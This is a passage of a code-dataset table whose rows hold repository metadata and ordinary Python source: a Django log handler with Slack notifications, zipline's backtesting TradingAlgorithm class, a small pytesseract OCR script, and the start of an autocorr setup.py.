hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c330f8a6990fea6359bab8467d42ea370ce5742 | 1,504 | py | Python | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 4 | 2017-06-02T08:48:48.000Z | 2021-11-21T23:57:15.000Z | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 3 | 2020-06-05T16:55:42.000Z | 2021-06-10T17:43:12.000Z | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 4 | 2015-12-15T14:27:51.000Z | 2017-04-21T21:42:27.000Z | """
Partially adapted with permission from ReportLab's DocEngine framework
"""
import requests
import logging
import json
import traceback
from django.views.debug import get_exception_reporter_filter
from django.conf import settings
class DbLogHandler(logging.Handler):
def emit(self, record):
from .models import Log, Issue
try:
request = record.request
filter = get_exception_reporter_filter(request)
request_repr = filter.get_request_repr(request)
except Exception:
request = None
request_repr = "Request repr() unavailable."
if record.exc_info:
exc_info = record.exc_info
stack_trace = '\n'.join(traceback.format_exception(*record.exc_info))
else:
exc_info = (None, record.getMessage(), None)
stack_trace = "No stack trace available"
rec = Log(level=record.levelname,
message=record.getMessage(),
request=request_repr,
traceback=stack_trace
)
if hasattr(record, 'corrId'):
rec.corrId = record.corrId
rec.save()
if record.levelname == 'ERROR':
Issue(log=rec, status='NOTSTARTED').save()
class SlackHandler(logging.Handler):
def emit(self, record):
new_data = {"text": '%s: %s' % (record.levelname, record.getMessage())}
requests.post(settings.SLACK_ENDPOINT_URL, data=json.dumps(new_data))
| 29.490196 | 81 | 0.62367 |
import requests
import logging
import json
import traceback
from django.views.debug import get_exception_reporter_filter
from django.conf import settings
class DbLogHandler(logging.Handler):
def emit(self, record):
from .models import Log, Issue
try:
request = record.request
filter = get_exception_reporter_filter(request)
request_repr = filter.get_request_repr(request)
except Exception:
request = None
request_repr = "Request repr() unavailable."
if record.exc_info:
exc_info = record.exc_info
stack_trace = '\n'.join(traceback.format_exception(*record.exc_info))
else:
exc_info = (None, record.getMessage(), None)
stack_trace = "No stack trace available"
rec = Log(level=record.levelname,
message=record.getMessage(),
request=request_repr,
traceback=stack_trace
)
if hasattr(record, 'corrId'):
rec.corrId = record.corrId
rec.save()
if record.levelname == 'ERROR':
Issue(log=rec, status='NOTSTARTED').save()
class SlackHandler(logging.Handler):
def emit(self, record):
new_data = {"text": '%s: %s' % (record.levelname, record.getMessage())}
requests.post(settings.SLACK_ENDPOINT_URL, data=json.dumps(new_data))
| true | true |
1c3310046683c750c56af215bc29b813ac883595 | 19,959 | py | Python | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | 2 | 2015-12-10T16:25:10.000Z | 2016-02-17T00:18:38.000Z | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | null | null | null | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import copy
import pytz
import pandas as pd
import numpy as np
from datetime import datetime
from itertools import groupby, ifilter
from operator import attrgetter
from zipline.errors import (
UnsupportedSlippageModel,
OverrideSlippagePostInit,
UnsupportedCommissionModel,
OverrideCommissionPostInit
)
from zipline.finance.performance import PerformanceTracker
from zipline.sources import DataFrameSource, DataPanelSource
from zipline.utils.factory import create_simulation_parameters
from zipline.transforms.utils import StatefulTransform
from zipline.finance.slippage import (
VolumeShareSlippage,
SlippageModel,
transact_partial
)
from zipline.finance.commission import PerShare, PerTrade, PerDollar
from zipline.finance.blotter import Blotter
from zipline.finance.constants import ANNUALIZER
from zipline.finance import trading
import zipline.protocol
from zipline.protocol import Event
from zipline.gens.composites import (
date_sorted_sources,
sequential_transforms,
alias_dt
)
from zipline.gens.tradesimulation import AlgorithmSimulator
DEFAULT_CAPITAL_BASE = float("1.0e5")
class TradingAlgorithm(object):
"""
Base class for trading algorithms. Inherit and overload
initialize() and handle_data(data).
A new algorithm could look like this:
```
class MyAlgo(TradingAlgorithm):
def initialize(self, sids, amount):
self.sids = sids
self.amount = amount
def handle_data(self, data):
sid = self.sids[0]
amount = self.amount
self.order(sid, amount)
```
To then to run this algorithm:
my_algo = MyAlgo([0], 100) # first argument has to be list of sids
stats = my_algo.run(data)
"""
def __init__(self, *args, **kwargs):
"""Initialize sids and other state variables.
:Arguments:
data_frequency : str (daily, hourly or minutely)
The duration of the bars.
annualizer : int <optional>
Which constant to use for annualizing risk metrics.
If not provided, will extract from data_frequency.
capital_base : float <default: 1.0e5>
How much capital to start with.
instant_fill : bool <default: False>
Whether to fill orders immediately or on next bar.
"""
self.datetime = None
self.registered_transforms = {}
self.transforms = []
self.sources = []
self._recorded_vars = {}
self.logger = None
self.benchmark_return_source = None
self.perf_tracker = None
# default components for transact
self.slippage = VolumeShareSlippage()
self.commission = PerShare()
if 'data_frequency' in kwargs:
self.set_data_frequency(kwargs.pop('data_frequency'))
else:
self.data_frequency = None
self.instant_fill = kwargs.pop('instant_fill', False)
# Override annualizer if set
if 'annualizer' in kwargs:
self.annualizer = kwargs['annualizer']
# set the capital base
self.capital_base = kwargs.pop('capital_base', DEFAULT_CAPITAL_BASE)
self.sim_params = kwargs.pop('sim_params', None)
if self.sim_params:
self.sim_params.data_frequency = self.data_frequency
self.perf_tracker = PerformanceTracker(self.sim_params)
self.blotter = kwargs.pop('blotter', None)
if not self.blotter:
self.blotter = Blotter()
self.portfolio_needs_update = True
self._portfolio = None
# an algorithm subclass needs to set initialized to True when
# it is fully initialized.
self.initialized = False
# call to user-defined constructor method
self.initialize(*args, **kwargs)
def __repr__(self):
"""
N.B. this does not yet represent a string that can be used
to instantiate an exact copy of an algorithm.
However, it is getting close, and provides some value as something
that can be inspected interactively.
"""
return """
{class_name}(
capital_base={capital_base}
sim_params={sim_params},
initialized={initialized},
slippage={slippage},
commission={commission},
blotter={blotter},
recorded_vars={recorded_vars})
""".strip().format(class_name=self.__class__.__name__,
capital_base=self.capital_base,
sim_params=repr(self.sim_params),
initialized=self.initialized,
slippage=repr(self.slippage),
commission=repr(self.commission),
blotter=repr(self.blotter),
recorded_vars=repr(self.recorded_vars))
def _create_data_generator(self, source_filter, sim_params):
"""
Create a merged data generator using the sources and
transforms attached to this algorithm.
::source_filter:: is a method that receives events in date
sorted order, and returns True for those events that should be
processed by the zipline, and False for those that should be
skipped.
"""
if self.benchmark_return_source is None:
benchmark_return_source = [
Event({'dt': dt,
'returns': ret,
'type': zipline.protocol.DATASOURCE_TYPE.BENCHMARK,
'source_id': 'benchmarks'})
for dt, ret in trading.environment.benchmark_returns.iterkv()
if dt.date() >= sim_params.period_start.date()
and dt.date() <= sim_params.period_end.date()
]
else:
benchmark_return_source = self.benchmark_return_source
date_sorted = date_sorted_sources(*self.sources)
if source_filter:
date_sorted = ifilter(source_filter, date_sorted)
with_tnfms = sequential_transforms(date_sorted,
*self.transforms)
with_alias_dt = alias_dt(with_tnfms)
with_benchmarks = date_sorted_sources(benchmark_return_source,
with_alias_dt)
# Group together events with the same dt field. This depends on the
# events already being sorted.
return groupby(with_benchmarks, attrgetter('dt'))
def _create_generator(self, sim_params, source_filter=None):
"""
Create a basic generator setup using the sources and
transforms attached to this algorithm.
::source_filter:: is a method that receives events in date
sorted order, and returns True for those events that should be
processed by the zipline, and False for those that should be
skipped.
"""
sim_params.data_frequency = self.data_frequency
# perf_tracker will be instantiated in __init__ if a sim_params
# is passed to the constructor. If not, we instantiate here.
if self.perf_tracker is None:
self.perf_tracker = PerformanceTracker(sim_params)
self.data_gen = self._create_data_generator(source_filter,
sim_params)
self.trading_client = AlgorithmSimulator(self, sim_params)
transact_method = transact_partial(self.slippage, self.commission)
self.set_transact(transact_method)
return self.trading_client.transform(self.data_gen)
def get_generator(self):
"""
Override this method to add new logic to the construction
of the generator. Overrides can use the _create_generator
method to get a standard construction generator.
"""
return self._create_generator(self.sim_params)
def initialize(self, *args, **kwargs):
pass
# TODO: make a new subclass, e.g. BatchAlgorithm, and move
# the run method to the subclass, and refactor to put the
# generator creation logic into get_generator.
def run(self, source, sim_params=None, benchmark_return_source=None):
"""Run the algorithm.
:Arguments:
source : can be either:
- pandas.DataFrame
- zipline source
- list of zipline sources
If pandas.DataFrame is provided, it must have the
following structure:
* column names must consist of ints representing the
different sids
* index must be DatetimeIndex
* array contents should be price info.
:Returns:
daily_stats : pandas.DataFrame
Daily performance metrics such as returns, alpha etc.
"""
if isinstance(source, (list, tuple)):
assert self.sim_params is not None or sim_params is not None, \
"""When providing a list of sources, \
sim_params have to be specified as a parameter
or in the constructor."""
elif isinstance(source, pd.DataFrame):
# if DataFrame provided, wrap in DataFrameSource
source = DataFrameSource(source)
elif isinstance(source, pd.Panel):
source = DataPanelSource(source)
if not isinstance(source, (list, tuple)):
self.sources = [source]
else:
self.sources = source
# Check for override of sim_params.
# If it isn't passed to this function,
# use the default params set with the algorithm.
# Else, we create simulation parameters using the start and end of the
# source provided.
if not sim_params:
if not self.sim_params:
start = source.start
end = source.end
sim_params = create_simulation_parameters(
start=start,
end=end,
capital_base=self.capital_base
)
else:
sim_params = self.sim_params
# Create transforms by wrapping them into StatefulTransforms
self.transforms = []
for namestring, trans_descr in self.registered_transforms.iteritems():
sf = StatefulTransform(
trans_descr['class'],
*trans_descr['args'],
**trans_descr['kwargs']
)
sf.namestring = namestring
self.transforms.append(sf)
# force a reset of the performance tracker, in case
# this is a repeat run of the algorithm.
self.perf_tracker = None
# create transforms and zipline
self.gen = self._create_generator(sim_params)
# loop through simulated_trading, each iteration returns a
# perf dictionary
perfs = []
for perf in self.gen:
perfs.append(perf)
# convert perf dict to pandas dataframe
daily_stats = self._create_daily_stats(perfs)
return daily_stats
def _create_daily_stats(self, perfs):
# create daily and cumulative stats dataframe
daily_perfs = []
# TODO: the loop here could overwrite expected properties
# of daily_perf. Could potentially raise or log a
# warning.
for perf in perfs:
if 'daily_perf' in perf:
perf['daily_perf'].update(
perf['daily_perf'].pop('recorded_vars')
)
daily_perfs.append(perf['daily_perf'])
else:
self.risk_report = perf
daily_dts = [np.datetime64(perf['period_close'], utc=True)
for perf in daily_perfs]
daily_stats = pd.DataFrame(daily_perfs, index=daily_dts)
return daily_stats
def add_transform(self, transform_class, tag, *args, **kwargs):
"""Add a single-sid, sequential transform to the model.
:Arguments:
transform_class : class
Which transform to use. E.g. mavg.
tag : str
How to name the transform. Can later be access via:
data[sid].tag()
Extra args and kwargs will be forwarded to the transform
instantiation.
"""
self.registered_transforms[tag] = {'class': transform_class,
'args': args,
'kwargs': kwargs}
def record(self, **kwargs):
"""
Track and record local variable (i.e. attributes) each day.
"""
for name, value in kwargs.items():
self._recorded_vars[name] = value
def order(self, sid, amount, limit_price=None, stop_price=None):
return self.blotter.order(sid, amount, limit_price, stop_price)
def order_value(self, sid, value, limit_price=None, stop_price=None):
"""
Place an order by desired value rather than desired number of shares.
If the requested sid is found in the universe, the requested value is
divided by its price to imply the number of shares to transact.
value > 0 :: Buy/Cover
value < 0 :: Sell/Short
Market order: order(sid, value)
Limit order: order(sid, value, limit_price)
Stop order: order(sid, value, None, stop_price)
StopLimit order: order(sid, value, limit_price, stop_price)
"""
last_price = self.trading_client.current_data[sid].price
if np.allclose(last_price, 0):
zero_message = "Price of 0 for {psid}; can't infer value".format(
psid=sid
)
self.logger.debug(zero_message)
# Don't place any order
return
else:
amount = value / last_price
return self.order(sid, amount, limit_price, stop_price)
@property
def recorded_vars(self):
return copy(self._recorded_vars)
@property
def portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
return self.perf_tracker.get_portfolio()
def updated_portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
if self.portfolio_needs_update:
self._portfolio = self.perf_tracker.get_portfolio()
self.portfolio_needs_update = False
return self._portfolio
def set_logger(self, logger):
self.logger = logger
def set_datetime(self, dt):
assert isinstance(dt, datetime), \
"Attempt to set algorithm's current time with non-datetime"
assert dt.tzinfo == pytz.utc, \
"Algorithm expects a utc datetime"
self.datetime = dt
def get_datetime(self):
"""
Returns a copy of the datetime.
"""
date_copy = copy(self.datetime)
assert date_copy.tzinfo == pytz.utc, \
"Algorithm should have a utc datetime"
return date_copy
def set_transact(self, transact):
"""
Set the method that will be called to create a
transaction from open orders and trade events.
"""
self.blotter.transact = transact
def set_slippage(self, slippage):
if not isinstance(slippage, SlippageModel):
raise UnsupportedSlippageModel()
if self.initialized:
raise OverrideSlippagePostInit()
self.slippage = slippage
def set_commission(self, commission):
if not isinstance(commission, (PerShare, PerTrade, PerDollar)):
raise UnsupportedCommissionModel()
if self.initialized:
raise OverrideCommissionPostInit()
self.commission = commission
def set_sources(self, sources):
assert isinstance(sources, list)
self.sources = sources
def set_transforms(self, transforms):
assert isinstance(transforms, list)
self.transforms = transforms
def set_data_frequency(self, data_frequency):
assert data_frequency in ('daily', 'minute')
self.data_frequency = data_frequency
self.annualizer = ANNUALIZER[self.data_frequency]
def order_percent(self, sid, percent, limit_price=None, stop_price=None):
"""
Place an order in the specified security corresponding to the given
percent of the current portfolio value.
Note that percent must expressed as a decimal (0.50 means 50\%).
"""
value = self.portfolio.portfolio_value * percent
return self.order_value(sid, value, limit_price, stop_price)
def order_target(self, sid, target, limit_price=None, stop_price=None):
"""
Place an order to adjust a position to a target number of shares. If
the position doesn't already exist, this is equivalent to placing a new
order. If the position does exist, this is equivalent to placing an
order for the difference between the target number of shares and the
current number of shares.
"""
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
req_shares = target - current_position
return self.order(sid, req_shares, limit_price, stop_price)
else:
return self.order(sid, target, limit_price, stop_price)
def order_target_value(self, sid, target, limit_price=None,
stop_price=None):
"""
Place an order to adjust a position to a target value. If
the position doesn't already exist, this is equivalent to placing a new
order. If the position does exist, this is equivalent to placing an
order for the difference between the target value and the
current value.
"""
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
req_value = target - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
else:
return self.order_value(sid, target, limit_price, stop_price)
def order_target_percent(self, sid, target, limit_price=None,
stop_price=None):
"""
Place an order to adjust a position to a target percent of the
current portfolio value. If the position doesn't already exist, this is
equivalent to placing a new order. If the position does exist, this is
equivalent to placing an order for the difference between the target
percent and the current percent.
Note that target must expressed as a decimal (0.50 means 50\%).
"""
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
else:
current_value = 0
target_value = self.portfolio.portfolio_value * target
req_value = target_value - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
| 36.488117 | 79 | 0.628288 |
from copy import copy
import pytz
import pandas as pd
import numpy as np
from datetime import datetime
from itertools import groupby, ifilter
from operator import attrgetter
from zipline.errors import (
UnsupportedSlippageModel,
OverrideSlippagePostInit,
UnsupportedCommissionModel,
OverrideCommissionPostInit
)
from zipline.finance.performance import PerformanceTracker
from zipline.sources import DataFrameSource, DataPanelSource
from zipline.utils.factory import create_simulation_parameters
from zipline.transforms.utils import StatefulTransform
from zipline.finance.slippage import (
VolumeShareSlippage,
SlippageModel,
transact_partial
)
from zipline.finance.commission import PerShare, PerTrade, PerDollar
from zipline.finance.blotter import Blotter
from zipline.finance.constants import ANNUALIZER
from zipline.finance import trading
import zipline.protocol
from zipline.protocol import Event
from zipline.gens.composites import (
date_sorted_sources,
sequential_transforms,
alias_dt
)
from zipline.gens.tradesimulation import AlgorithmSimulator
DEFAULT_CAPITAL_BASE = float("1.0e5")
class TradingAlgorithm(object):
def __init__(self, *args, **kwargs):
self.datetime = None
self.registered_transforms = {}
self.transforms = []
self.sources = []
self._recorded_vars = {}
self.logger = None
self.benchmark_return_source = None
self.perf_tracker = None
self.slippage = VolumeShareSlippage()
self.commission = PerShare()
if 'data_frequency' in kwargs:
self.set_data_frequency(kwargs.pop('data_frequency'))
else:
self.data_frequency = None
self.instant_fill = kwargs.pop('instant_fill', False)
if 'annualizer' in kwargs:
self.annualizer = kwargs['annualizer']
self.capital_base = kwargs.pop('capital_base', DEFAULT_CAPITAL_BASE)
self.sim_params = kwargs.pop('sim_params', None)
if self.sim_params:
self.sim_params.data_frequency = self.data_frequency
self.perf_tracker = PerformanceTracker(self.sim_params)
self.blotter = kwargs.pop('blotter', None)
if not self.blotter:
self.blotter = Blotter()
self.portfolio_needs_update = True
self._portfolio = None
self.initialized = False
self.initialize(*args, **kwargs)
def __repr__(self):
return """
{class_name}(
capital_base={capital_base}
sim_params={sim_params},
initialized={initialized},
slippage={slippage},
commission={commission},
blotter={blotter},
recorded_vars={recorded_vars})
""".strip().format(class_name=self.__class__.__name__,
capital_base=self.capital_base,
sim_params=repr(self.sim_params),
initialized=self.initialized,
slippage=repr(self.slippage),
commission=repr(self.commission),
blotter=repr(self.blotter),
recorded_vars=repr(self.recorded_vars))
def _create_data_generator(self, source_filter, sim_params):
if self.benchmark_return_source is None:
benchmark_return_source = [
Event({'dt': dt,
'returns': ret,
'type': zipline.protocol.DATASOURCE_TYPE.BENCHMARK,
'source_id': 'benchmarks'})
for dt, ret in trading.environment.benchmark_returns.iterkv()
if dt.date() >= sim_params.period_start.date()
and dt.date() <= sim_params.period_end.date()
]
else:
benchmark_return_source = self.benchmark_return_source
date_sorted = date_sorted_sources(*self.sources)
if source_filter:
date_sorted = ifilter(source_filter, date_sorted)
with_tnfms = sequential_transforms(date_sorted,
*self.transforms)
with_alias_dt = alias_dt(with_tnfms)
with_benchmarks = date_sorted_sources(benchmark_return_source,
with_alias_dt)
return groupby(with_benchmarks, attrgetter('dt'))
def _create_generator(self, sim_params, source_filter=None):
sim_params.data_frequency = self.data_frequency
if self.perf_tracker is None:
self.perf_tracker = PerformanceTracker(sim_params)
self.data_gen = self._create_data_generator(source_filter,
sim_params)
self.trading_client = AlgorithmSimulator(self, sim_params)
transact_method = transact_partial(self.slippage, self.commission)
self.set_transact(transact_method)
return self.trading_client.transform(self.data_gen)
def get_generator(self):
return self._create_generator(self.sim_params)
def initialize(self, *args, **kwargs):
pass
def run(self, source, sim_params=None, benchmark_return_source=None):
if isinstance(source, (list, tuple)):
assert self.sim_params is not None or sim_params is not None, \
"""When providing a list of sources, \
sim_params have to be specified as a parameter
or in the constructor."""
elif isinstance(source, pd.DataFrame):
source = DataFrameSource(source)
elif isinstance(source, pd.Panel):
source = DataPanelSource(source)
if not isinstance(source, (list, tuple)):
self.sources = [source]
else:
self.sources = source
# use the default params set with the algorithm.
# Else, we create simulation parameters using the start and end of the
# source provided.
if not sim_params:
if not self.sim_params:
start = source.start
end = source.end
sim_params = create_simulation_parameters(
start=start,
end=end,
capital_base=self.capital_base
)
else:
sim_params = self.sim_params
# Create transforms by wrapping them into StatefulTransforms
self.transforms = []
for namestring, trans_descr in self.registered_transforms.iteritems():
sf = StatefulTransform(
trans_descr['class'],
*trans_descr['args'],
**trans_descr['kwargs']
)
sf.namestring = namestring
self.transforms.append(sf)
# force a reset of the performance tracker, in case
# this is a repeat run of the algorithm.
self.perf_tracker = None
# create transforms and zipline
self.gen = self._create_generator(sim_params)
# loop through simulated_trading, each iteration returns a
# perf dictionary
perfs = []
for perf in self.gen:
perfs.append(perf)
# convert perf dict to pandas dataframe
daily_stats = self._create_daily_stats(perfs)
return daily_stats
def _create_daily_stats(self, perfs):
# create daily and cumulative stats dataframe
daily_perfs = []
# TODO: the loop here could overwrite expected properties
# of daily_perf. Could potentially raise or log a
# warning.
for perf in perfs:
if 'daily_perf' in perf:
perf['daily_perf'].update(
perf['daily_perf'].pop('recorded_vars')
)
daily_perfs.append(perf['daily_perf'])
else:
self.risk_report = perf
daily_dts = [np.datetime64(perf['period_close'], utc=True)
for perf in daily_perfs]
daily_stats = pd.DataFrame(daily_perfs, index=daily_dts)
return daily_stats
def add_transform(self, transform_class, tag, *args, **kwargs):
self.registered_transforms[tag] = {'class': transform_class,
'args': args,
'kwargs': kwargs}
def record(self, **kwargs):
for name, value in kwargs.items():
self._recorded_vars[name] = value
def order(self, sid, amount, limit_price=None, stop_price=None):
return self.blotter.order(sid, amount, limit_price, stop_price)
def order_value(self, sid, value, limit_price=None, stop_price=None):
last_price = self.trading_client.current_data[sid].price
if np.allclose(last_price, 0):
zero_message = "Price of 0 for {psid}; can't infer value".format(
psid=sid
)
self.logger.debug(zero_message)
return
else:
amount = value / last_price
return self.order(sid, amount, limit_price, stop_price)
@property
def recorded_vars(self):
return copy(self._recorded_vars)
@property
def portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
return self.perf_tracker.get_portfolio()
def updated_portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
if self.portfolio_needs_update:
self._portfolio = self.perf_tracker.get_portfolio()
self.portfolio_needs_update = False
return self._portfolio
def set_logger(self, logger):
self.logger = logger
def set_datetime(self, dt):
assert isinstance(dt, datetime), \
"Attempt to set algorithm's current time with non-datetime"
assert dt.tzinfo == pytz.utc, \
"Algorithm expects a utc datetime"
self.datetime = dt
def get_datetime(self):
date_copy = copy(self.datetime)
assert date_copy.tzinfo == pytz.utc, \
"Algorithm should have a utc datetime"
return date_copy
def set_transact(self, transact):
self.blotter.transact = transact
def set_slippage(self, slippage):
if not isinstance(slippage, SlippageModel):
raise UnsupportedSlippageModel()
if self.initialized:
raise OverrideSlippagePostInit()
self.slippage = slippage
def set_commission(self, commission):
if not isinstance(commission, (PerShare, PerTrade, PerDollar)):
raise UnsupportedCommissionModel()
if self.initialized:
raise OverrideCommissionPostInit()
self.commission = commission
def set_sources(self, sources):
assert isinstance(sources, list)
self.sources = sources
def set_transforms(self, transforms):
assert isinstance(transforms, list)
self.transforms = transforms
def set_data_frequency(self, data_frequency):
assert data_frequency in ('daily', 'minute')
self.data_frequency = data_frequency
self.annualizer = ANNUALIZER[self.data_frequency]
def order_percent(self, sid, percent, limit_price=None, stop_price=None):
value = self.portfolio.portfolio_value * percent
return self.order_value(sid, value, limit_price, stop_price)
def order_target(self, sid, target, limit_price=None, stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
req_shares = target - current_position
return self.order(sid, req_shares, limit_price, stop_price)
else:
return self.order(sid, target, limit_price, stop_price)
def order_target_value(self, sid, target, limit_price=None,
stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
req_value = target - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
else:
return self.order_value(sid, target, limit_price, stop_price)
def order_target_percent(self, sid, target, limit_price=None,
stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
else:
current_value = 0
target_value = self.portfolio.portfolio_value * target
req_value = target_value - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
| true | true |
1c3310438ac0db658cd7671f27d9557f80502ddf | 691 | py | Python | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | 1 | 2019-06-05T22:25:14.000Z | 2019-06-05T22:25:14.000Z | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | null | null | null | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PIL import Image
from pytesseract import image_to_string
import sys
import os
import time
from time import sleep
print("Example --> /root/Desktop/")
image_path = raw_input("Image path: ")
print("Example --> picture.png")
image_name = raw_input("Image name: ")
os.system("clear")
img = Image.open(image_path+image_name)
try:
text = image_to_string(img)
#text = image_to_string(img,lang="eng")
except:
print("[-]Uncompleted")
for i in range(50):
sys.stdout.write('\r')
sleep(0.12)
os.system("clear||cls")
print("[+]Completed")
file = open(image_path+image_name + ".txt","w")
file.write(text)
file.close()
| 13.288462 | 48 | 0.671491 |
from PIL import Image
from pytesseract import image_to_string
import sys
import os
import time
from time import sleep
print("Example --> /root/Desktop/")
image_path = raw_input("Image path: ")
print("Example --> picture.png")
image_name = raw_input("Image name: ")
os.system("clear")
img = Image.open(image_path+image_name)
try:
text = image_to_string(img)
except:
print("[-]Uncompleted")
for i in range(50):
sys.stdout.write('\r')
sleep(0.12)
os.system("clear||cls")
print("[+]Completed")
file = open(image_path+image_name + ".txt","w")
file.write(text)
file.close()
| true | true |
1c331071f4bf4f4c900885a34d173bfff95f2e89 | 2,832 | py | Python | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | from os import path
from setuptools import setup, find_packages, Extension
import sys
import versioneer
min_pybind11_version = (2, 3)
# NOTE: This file must remain Python 2 compatible for the foreseeable future,
# to ensure that we error out properly for people with outdated setuptools
# and/or pip.
min_version = (3, 6)
if sys.version_info < min_version:
error = """
autocorr does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
sys.exit(error)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as requirements_file:
# Parse requirements.txt, ignoring any commented-out lines.
requirements = [line for line in requirements_file.read().splitlines()
if not line.startswith('#')]
extensions = []
def get_pybind11_headers():
import pybind11
major, minor, _ = pybind11.version_info
if major < 2 or minor < 3:
raise Exception(
"autocorr requires pybind11 "
"{0}.{1} or higher".format(*min_pybind11_version))
return pybind11.get_include()
c_mulittau = Extension(
'autocorr.cAutocorr',
sources=['src/pyMultiTau.cpp', 'src/cpu_multitau.cpp', 'src/fftautocorr.cpp'],
include_dirs=[get_pybind11_headers()],
extra_compile_args=['-std=c++11', '-fopenmp'],
libraries=['fftw3_omp', 'm', 'gomp']
)
extensions.append(c_mulittau)
setup(
name='autocorr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Library for XPCS and image autocorrelation in general",
long_description=readme,
author="BES Data Solutions Pilot",
author_email='dallan@bnl.gov',
url='https://github.com/scikit-beam/autocorr',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
# 'command = some.module:some_function',
],
},
include_package_data=True,
package_data={
'autocorr': [
# When adding files here, remember to update MANIFEST.in as well,
# or else they will not be included in the distribution on PyPI!
# 'path/to/data_file',
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
ext_modules=extensions
)
| 31.120879 | 82 | 0.667726 | from os import path
from setuptools import setup, find_packages, Extension
import sys
import versioneer
min_pybind11_version = (2, 3)
min_version = (3, 6)
if sys.version_info < min_version:
error = """
autocorr does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
sys.exit(error)
